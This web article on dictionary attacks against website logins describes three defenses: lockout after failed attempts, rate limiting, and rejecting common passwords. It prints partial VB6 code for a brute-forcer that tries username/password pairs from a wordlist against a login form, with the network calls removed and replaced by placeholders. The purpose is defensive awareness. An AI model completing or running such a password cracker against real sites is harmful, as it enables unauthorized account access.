I wrote this Cracker to gain entry into a client’s Intranet, and did so in 2 minutes with a basic dictionary of 100 words (cat,dog,admin,…). The purpose of this article is to stun you into taking the necessary steps to protect your site. I was prompted to write this article because of posted literature exposing ebay.com susceptibility. If you are looking for a Cracker engine, it is not here. I have removed the communication and word library elements, but the architecture and code are in place so that it is easy to see how entry is gained to your site.
Despite the abundance of security publications, advertisements and television hype describing most unauthorized entry to computers as gained via network vulnerabilities, system flaws, bugs, loopholes, and buffer overflows, the weakest point of any network is the user. Specifically, the user uses a UID of ‘admin’ and PW of ‘password’ or other common words. Truly, this is incredibility widespread.
The important elements of conducting a dictionary attack are 1) sending multiple UID/PW combinations, 2) the rate of sending UID/PW combinations, and 3) the ‘Commonness’ of the UID/PW words. To defend against a dictionary attack, simply address any one of the elements above and the defending site will be significantly strengthened (disclaimer.h).
In each element below, the defending server is an MS IIS Server; however, the concept arguments can be applied to any server.
1. To defend against multiple UID/PW combinations, use the Session variable to track 3 incorrect access attempts. On the next attempt within the Session automatically refuse access. In fact, even the correct UID/PW will be rejected in this scenario. When the Session times-out, the system resets and the user can again gain access with the correct UID/PW.
2. The ‘rate’ of sending UID/PW addresses the number of attempts to login within a given period of time. After a user has failed 3 times, code the application to refuse login attempts for the next hour. The dictionary attack is dead as it would take ~ 6.8 YEARS to use the smallest 100 word library.
3. ‘Common’ words: need I say more? To force users to use uncommon words or random characters, generate passwords for users. I don’t like that method, so I take new passwords and compared them against a word library. If the submitted PW is in the library then a different one is requested.
The VB6 code below is compiled into a simple .exe that takes parameters such as site address, UID and PW. Using a coma delimited .txt file of common words, the program sets a matrix of possible UID/PW combinations and sends them to the site for verification. The remote server’s response is analyzed to determine if access was granted. When the program is finished, a MsgBox is displayed with the UID/PW that were granted access.
Public Function getDictionary(ByVal strURL As String,_
ByVal strMethod As String, ByVal strForm As String, _
ByVal strMatchNoEntry As String, ByVal UidLimitLen As Integer) As String
Dim mHTTP As Object, aryDictionary() As String
Dim fso As Object, TextStream As Object, S As String, ApplicationPath As String
ApplicationPath = App.Path & "\"
Set fso = CreateObject("Scripting.FileSystemObject")
Set TextStream = fso.OpenTextFile(ApplicationPath & "wordlist.txt", 1)
S = S & TextStream.ReadAll
TextStream.Close
DoEvents
getDictionary = getDictionaryAccess(strForm, UidLimitLen, oHTTP, strMatchNoEntry, aryDictionary)
End Function Private Function getDictionaryAccess(ByVal Params As String, ByVal iSections As Integer,_
ByRef mHTTP As Object, ByVal strMatchNoEntry As String,_
ByRef aryDictionary() As String) As String
'Returns ";" delimited string of params
'assumes two params of username and password, the exact name value are passed in
'getDictionaryAccess = "uid=matt&pwd=1;uid=matt&pwd=2;10006=DTM&10007=1999"
'this guy will go 1, 2 and 3 characters against the Dictionary, then Dictionary against Dictionary
'the random attack does the 1 to 3 uid and pw matrix
Dim aryParams As Variant, strTemp As String, aryTemp() As String
Dim uid As Integer, pw As Integer, strResponse As String, strSomeAccessPoints As String
iSections = iSections + 1 'iSecitons allows control of word lenght
On Error Resume Next
For uid = 0 To UBound(aryDictionary)
For pw = 0 To UBound(aryDictionary)
If (Len(aryDictionary(uid)) < iSections) And (Len(aryDictionary(pw)) < iSections) Then
getDictionaryAccess = aryParams(0) & "=" & aryDictionary(uid) & "&" & _
aryParams(1) & "=" & aryDictionary(pw)
mHTTP engine method call
Call IMWaiting(mHTTP)
strResponse = mHTTP engine data retrieval
Call IMWaiting(mHTTP)
strResponse = Replace(strResponse, Chr(13), ";")
If (strResponse <> "") Then
If Not CBool(InStr(CStr(strResponse), CStr(strMatchNoEntry)) > 0) Then
'strSomeAccessPoints has the params that GRANTED ACCESS
strSomeAccessPoints = strSomeAccessPoints & aryDictionary(uid) & "," & aryDictionary(pw) & ";"
End If
End If
strResponse = ""
DoEvents
End If
Next
Next
On Error GoTo 0
getDictionaryAccess = strSomeAccessPoints
End Function
Please, notice this is very standard programing, protect yourself!
NOTE: I found these great tools that Google is giving away for free. They help you develop faster and make windows work better.
Firefox with Google Toolbar
Article By, Matthew P. Burnett.